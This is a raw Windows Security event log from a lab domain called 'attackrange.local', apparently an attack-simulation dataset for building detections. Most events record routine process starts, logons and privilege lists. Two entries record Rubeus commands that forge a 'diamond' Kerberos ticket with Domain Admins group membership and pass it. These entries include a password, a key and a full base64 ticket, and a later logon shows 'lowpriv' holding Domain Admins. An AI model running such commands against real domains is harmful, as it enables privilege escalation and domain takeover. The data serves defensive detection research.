4689001331300x8020000000000000395289Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x2acC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
4688201331200x8020000000000000395288Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x2acC:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395287Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xfc0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
4688201331200x8020000000000000395286Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xfc0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395285Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xca8C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
4688201331200x8020000000000000395284Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xca8C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395283Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x10x1148C:\Windows\System32\backgroundTaskHost.exe
4634001254500x8020000000000000186264Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094df23
4627001255400x8020000000000000186263Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1094df2311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186262Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x1094df23KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251160%%1833---%%18430x0%%1842
4672001254800x8020000000000000186261Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094df2SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4627001255400x8020000000000000186260Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094dbc311
ATTACKRANGE\Domain Users
%{S-1-1-0}
%{S-1-5-32-545}
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Administrators
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\Domain Admins
%{S-1-18-1}
%{S-1-5-21-2442966654-584408786-1775486684-572}
Mandatory Label\High Mandatory Level
4624201254400x8020000000000000186259Securityar-win-dc.attackrange.localNULL SID--0x0ATTACKRANGE\lowprivlowprivATTACKRANGE.LOCAL0x1094dbc3KerberosKerberos-{419b296a-b261-dfbf-4061-566b1c9ac331}--00x0-10.0.1.1550067%%1840---%%18430x0%%1842
4672001254800x8020000000000000186258Securityar-win-dc.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x1094dbcSeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4689001331300x8020000000000000395282Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x00x10acC:\Rubeus.exe
4688201331200x8020000000000000395281Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x10acC:\Rubeus.exe%%19380x1258Rubeus.exe asktgs /service:cifs/ar-win-dc.attackrange.local /nowrap /ptt /ticket:doIFzjCCBcqgAwIBBaEDAgEWooIExTCCBMFhggS9MIIEuaADAgEFoRMbEUFUVEFDS1JBTkdFLkxPQ0FMoiYwJKADAgECoR0wGxsGa3JidGd0GxFBVFRBQ0tSQU5HRS5MT0NBTKOCBHMwggRvoAMCARKhAwIBA6KCBGEEggRdyjNAgvhKJRdijZX3haYHnUCqO/GmABqUotkmCBsdwF7zHdlzeosUkNDNzKdy0LS7mkN9PS+YiVOBG0rzpArZPlmoWB5whBJXYf9phZqv+yAt23hbgeTg2ZxxsFQPWhO6HKQYdAjGp20RM2pOlJEzk9MAohkT6yXMUT4yVYzIYyoy68kdmveYqEVoDhJkGHzmM8dDMJuhjLxSqPcgUxHcSWCWXo1IvpoesDAXcsQgnPFlCjqDDPeFaDktrxueXcf5kZo+E2+01NBPY1yvWkKuxeXWfHWuCa6Zc/hRynVWafkGNUWH1xC3NgHLFSpU4HLZyyJ3UJDQ9rzgGDXmjO5MeBctTUqM5a4wiRggYz4odQ14elIRoICWILFOp2U/+7hp8Vhg2rfIh01+8hRYEzcISuvI7YRf2XgxA9ZvSrwWRJjxIIDQS/zfhJkUwMcTU2c/89meYuj93jznrvvu4EzMWsZRqbWy1lCT5PftDp9tEf+iugABbIb0jGZvVBpQ6+hX0rlvB3Gba20jaFXLoJD32rDSbP+c1UGg5OksxaOyVcgvDbnprEdxuoRII5tizM6UWT6RsI5CKZbfLG8AtPz+cWZFz0h7g64qIOj0WYtfg++2bi3bylHnklJ4llxXm1yrlcPk1CY2zaUNXF+8aoh5NLCC1hNp2g0X8C6m5Q/eeMJetiApqB9vrK0I/uk8Fdg3dBx4J/IBWA/xg6olTr7Isi+lGRjx1rVBVTOhAWjDJWha9GH/EVif8+FDL8MOV+dG5dQlepdr3QuGPg7QOhBmWGs1JuzPBUoIO8171wn7cn0i+wQSaAhQpMTMWkfWeKiDZfreLXDvwk8YlGGcQlyA2H45HhcrjtDMAp2nDISNtQ23qlLABzMpJgfqE1XkAG1IyVpj4d+hli+2tXz7CnM0p0yx9vOZa1FZ+gyxT4xWd2Csr5KRwctdzdDJLVdYzUxBL/Z+L6FweXNzDZOeKCGPKSDIBZ6dX8Y/+FukTguAiwf/5EBwLvj3qxIwrqbIcPCdXE1fadk52+b0S6t4dxTVwtAYREG6lYPh1Dxx8XkAPbEkyUz80wlRj8MENC3PrX3CahhBWLQGCB96lVvxm9Gs+AmWV+QcH34qD0aOyzEi5Mz1WlXZX6npvocIGFHrICSyh1DpbjmO7y+HOKEssqZZzHXTzZbZYEqJFEY8P5MHSPdJDtl3L/2COwD+xZutNEplQL3uQgAhZvECXjt2uWbs+3bO7xZRy3py6GTlfqLLGZYAEJLlcy0QMFbiP36a0FjQlq8mZV2ugkJGYm5ENuaBpuWNgzhX1fbq+rjPpbV4JlJ4BHly3KFYJuicjNYz5LZ5Sa3uG4PfhVDh9hfRP3gMopEPn+Uwr95yUxaxkOOen52MEL0ckLB2wPcUnqYlKlRwLakDknSh+Kop7pHbh7Mow6d+2yxTy8zRrDF/6zw4FD99xymZJqb6lIHj2PWSQ5WaWDbBxWmSoJuf+3NviaOB9DCB8aADAgEAooHpBIHmfYHjMIHgoIHdMIHaMIHXoCswKaADAgESoSIEIBxsUpqIBnBJtV4abnwMztfcvKxnGo6EgkCMgpigGnFjoRMbEUFUVEFDS1JBTkdFLkxPQ0FMohQwEqADAgEBoQswCRsHbG93cHJpdqMHAwUAQOEAAKURGA8yMDIzMTAwNTIwMDIyNlqmERgPMjAyMzEwMDYwNjAyMjZapxEYDzIwMjMxMDEyMjAwMjI2WqgTGxFBVFRBQ0tSQU5HRS5MT0NBTKkmMCSgAwIBAqEdMBsbBmtyYnRndBsRQVRUQUNLUkFOR0UuTE9DQUw=NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level
4769001433700x8020000000000000186257Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-DC$ATTACKRANGE\AR-WIN-DC$0x408000100x12::ffff:10.0.1.15500660x0{e226f66b-8ab3-54c1-f256-91039235f362}-
4634001254500x8020000000000000395280Securityar-win-2.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x96ba382
4634001254500x8020000000000000186256Securityar-win-dc.attackrange.localATTACKRANGE\lowpriv2lowpriv2ATTACKRANGE0x108e8613
4768001433900x8020000000000000186255Securityar-win-dc.attackrange.locallowprivattackrange.localATTACKRANGE\lowprivkrbtgtATTACKRANGE\krbtgt0x408100100x00x122::ffff:10.0.1.1550065
4689001331300x8020000000000000395279Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x00x184C:\Rubeus.exe
4688201331200x8020000000000000395278Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x184C:\Rubeus.exe%%19380x1258Rubeus.exe diamond /user:lowpriv /password:MPW2tGC7Eo7Jaral2qc /krbkey:8b605a4af251f69318fb5c23833f28a70dae789098f7be9ab59799975cab8f30 /enctype:aes /domain:attackrange.local /ticketuser:lowpriv /ticketuserid:1115 /groups:512 /nowrapNULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level
4634001254500x8020000000000000186254Securityar-win-dc.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x10941033
4689001331300x8020000000000000395277Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10xfe0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
4688201331200x8020000000000000395276Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70xfe0C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395275Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x13e0C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
4688201331200x8020000000000000395274Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x13e0C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4634001254500x8020000000000000186253Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109418f3
4627001255400x8020000000000000186252Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109418f311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186251Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109418f3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251159%%1833---%%18430x0%%1842
4672001254800x8020000000000000186250Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109418fSeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4634001254500x8020000000000000186249Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109414e3
4627001255400x8020000000000000186248Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109414e311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186247Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109414e3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251158%%1833---%%18430x0%%1842
4672001254800x8020000000000000186246Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109414eSeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4627001255400x8020000000000000186245Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-21-2442966654-584408786-1775486684-1115lowprivATTACKRANGE.LOCAL0x1094103311
ATTACKRANGE\Domain Users
%{S-1-1-0}
%{S-1-5-32-545}
BUILTIN\Pre-Windows 2000 Compatible Access
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
Authentication authority asserted identity
Mandatory Label\Medium Plus Mandatory Level
4624201254400x8020000000000000186244Securityar-win-dc.attackrange.localNULL SID--0x0ATTACKRANGE\lowprivlowprivATTACKRANGE.LOCAL0x10941033KerberosKerberos-{d6f31c8f-91b0-52da-9059-3bb4668acbd0}--00x0-10.0.1.1550059%%1840---%%18430x0%%1842
4769001433700x8020000000000000186243Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALkrbtgtATTACKRANGE\krbtgt0x608100100x12::ffff:10.0.1.15500630x0{08f5e3f5-fbac-168a-844a-51e7bbe9267d}-
4769001433700x8020000000000000186242Securityar-win-dc.attackrange.locallowpriv@ATTACKRANGE.LOCALATTACKRANGE.LOCALAR-WIN-DC$ATTACKRANGE\AR-WIN-DC$0x408100000x12::ffff:10.0.1.15500620x0{08f5e3f5-fbac-168a-844a-51e7bbe9267d}-
4768001433900x8020000000000000186241Securityar-win-dc.attackrange.locallowprivATTACKRANGE.LOCALATTACKRANGE\lowprivkrbtgtATTACKRANGE\krbtgt0x408100100x00x122::ffff:10.0.1.1550061
4634001254500x8020000000000000186240Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10940603
4627001255400x8020000000000000186239Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1094060311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186238Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10940603KerberosKerberos-{5d2976c3-f935-4dd0-6523-aa10b5a0ab92}--00x0-::151157%%1833---%%18430x0%%1842
4672001254800x8020000000000000186237Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1094060SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4689001331300x8020000000000000186236Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10xd28C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe
4688201331200x8020000000000000186235Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70xd28C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000186234Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x1178C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
4688201331200x8020000000000000186233Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x1178C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000186232Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x5f0C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
4688201331200x8020000000000000186231Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x5f0C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000186230Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10xbb4C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
4688201331200x8020000000000000186229Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70xbb4C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000186228Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x10x4c4C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
4688201331200x8020000000000000186227Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x3e70x4c4C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x294"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4634001254500x8020000000000000186226Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10913463
4689001331300x8020000000000000395273Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x1330C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe
4688201331200x8020000000000000395272Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x1330C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395271Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe
4688201331200x8020000000000000395270Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x1300C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4689001331300x8020000000000000395269Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x10x12e4C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe
4688201331200x8020000000000000395268Securityar-win-2.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-2$ATTACKRANGE0x3e70x12e4C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe%%19360x770"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"NULL SID--0x0C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeMandatory Label\System Mandatory Level
4634001254500x8020000000000000186225Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10911633
4634001254500x8020000000000000186224Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109126d3
4634001254500x8020000000000000186223Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10912bc3
4627001255400x8020000000000000186222Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1091346311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186221Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10913463KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251156%%1840---%%18430x0%%1842
4672001254800x8020000000000000186220Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1091346SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4627001255400x8020000000000000186219Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x10912bc311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186218Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10912bc3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-10.0.1.1451155%%1833---%%18430x0%%1842
4672001254800x8020000000000000186217Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x10912bcSeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4627001255400x8020000000000000186216Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x109126d311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186215Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x109126d3KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-::10%%1833---%%18430x0%%1842
4672001254800x8020000000000000186214Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x109126dSeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4627001255400x8020000000000000186213Securityar-win-dc.attackrange.localS-1-0-0--0x0S-1-5-18AR-WIN-DC$ATTACKRANGE.LOCAL0x1091163311
BUILTIN\Administrators
Everyone
BUILTIN\Pre-Windows 2000 Compatible Access
BUILTIN\Users
BUILTIN\Windows Authorization Access Group
NT AUTHORITY\NETWORK
NT AUTHORITY\Authenticated Users
NT AUTHORITY\This Organization
ATTACKRANGE\AR-WIN-DC$
%{S-1-5-21-2442966654-584408786-1775486684-516}
NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS
Authentication authority asserted identity
ATTACKRANGE\Denied RODC Password Replication Group
Mandatory Label\System Mandatory Level
4624201254400x8020000000000000186212Securityar-win-dc.attackrange.localNULL SID--0x0NT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE.LOCAL0x10911633KerberosKerberos-{b807d5b2-f581-94c6-3e46-18a69e3ac21e}--00x0-fe80::10c7:c32d:f763:aab251154%%1833---%%18430x0%%1842
4672001254800x8020000000000000186211Securityar-win-dc.attackrange.localNT AUTHORITY\SYSTEMAR-WIN-DC$ATTACKRANGE0x1091163SeSecurityPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeTakeOwnershipPrivilege
SeDebugPrivilege
SeSystemEnvironmentPrivilege
SeLoadDriverPrivilege
SeImpersonatePrivilege
SeDelegateSessionUserImpersonatePrivilege
SeEnableDelegationPrivilege
4688201331200x8020000000000000395267Securityar-win-2.attackrange.localATTACKRANGE\lowprivlowprivATTACKRANGE0x93ad250x1268C:\Windows\System32\conhost.exe%%19380x1258\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1NULL SID--0x0C:\Windows\System32\cmd.exeMandatory Label\Medium Mandatory Level
